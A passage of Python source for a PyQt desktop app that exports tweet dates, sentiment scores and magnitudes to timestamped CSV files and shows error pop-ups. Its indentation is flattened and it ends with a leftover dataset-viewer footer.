self.printMessages(['End date is improperly set. Check to see that the date is correct/exists.'])
return None
return endDate
'''
Toggles the export button.
Input - self:Ui_Window
Output - None
'''
def enableExport(self):
self.ui.exportPushButton.setEnabled(True)
'''
Exports date, score/magntitude, and tweet text to csv and pops up a window when done
Input - self:Ui_Window
Output - None
'''
def exportValues(self):
currentTimeDate = datetime.datetime.now()
currentTimeDate = str(currentTimeDate.year)+'-'+str(currentTimeDate.month)+'-'+str(currentTimeDate.day)+'-'+str(currentTimeDate.hour)+'-'+str(currentTimeDate.minute)+'-'+str(currentTimeDate.second)
with open(currentTimeDate+'_'+self.get_username()+'_score.csv', mode='w') as score_file:
writer = csv.writer(score_file)
for i in range(len(self.plotData[0])):
writer.writerow( [ str(self.plotData[0][i]), self.plotData[1][i],
self.tweetList[i].full_text.encode(encoding='UTF-8', errors='replace') ] )
with open(currentTimeDate+'_'+self.get_username()+'_magnitude.csv', mode='w') as magnitude_file:
writer = csv.writer(magnitude_file)
for i in range(len(self.plotData[0])):
writer.writerow( [ str(self.plotData[0][i]), self.plotData[2][i],
self.tweetList[i].full_text.encode(encoding='UTF-8', errors='replace') ] )
msgBox = QMessageBox()
msgBox.setText('CSV files exported!')
msgBox.exec()
'''
Prints out messages in a pop up window
Input - self:Ui_Window
Output - None
'''
def printMessages(self, messageList):
msgBox = QMessageBox()
msgBox.setIcon(QMessageBox.Critical)
msgBox.setWindowTitle('Errors occured!')
tempString = ''
for message in messageList:
tempString += (message + '\n')
msgBox.setText(tempString)
msgBox.exec()
if __name__ == "__main__":
app = QApplication(sys.argv)
window = Ui_Window()
window.show()
sys.exit(app.exec_()) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.